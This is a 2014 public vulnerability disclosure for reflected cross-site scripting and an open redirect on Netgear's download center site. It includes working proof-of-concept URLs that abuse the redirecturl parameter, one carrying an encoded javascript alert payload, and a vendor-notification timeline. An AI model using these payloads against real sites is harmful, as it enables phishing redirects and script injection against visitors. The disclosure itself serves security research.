######################
# Exploit Title : downloadcenter.netgear.com XSS/Open redirection vulnerabilities.

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://www.netgear.com

# Date : 2014-07-19

# Tested on : Windows 7 / Mozilla Firefox
              Windows 7 / Chrome
              Linux / Mozilla Firefox

######################

# Descritpion:

The website " downloadcenter.netgear.com " suffers from cross site scripting and open redirection vulnerabilities.

######################

# PoC Exploit:

 Redirection to any (phishing?) site:

1) Connect to url: http://downloadcenter.netgear.com/en/Disclaimer.aspx?redirecturl=http://www.homelab.it

2) Click on "Download" button


 XSS Reflected:
 
1) Connect to url: http://downloadcenter.netgear.com/en/Disclaimer.aspx?redirecturl=javascript://www.xss.com?xss=%250aalert%2528/XSS/%2529

2) Click on "Download" button


# PoC video is available at:

https://www.youtube.com/watch?v=JCDDk_0_mQ8


######################

# Vulnerability Disclosure Timeline:

2014-07-19:  Discovered vulnerability
2014-07-19:  Vendor Notification
2014-08-01:  No Vendor Response/Feedback
2014-08-14:  Vendor Notification
2014-09-19:  No Vendor Response/Feedback 
2014-09-19:  Public Disclosure

######################

Discovered By : Claudio Viviani
		http://www.homelab.it

		info@homelab.it
		homelabit@protonmail.ch

		https://www.facebook.com/homelabit
		https://twitter.com/homelabit
		https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################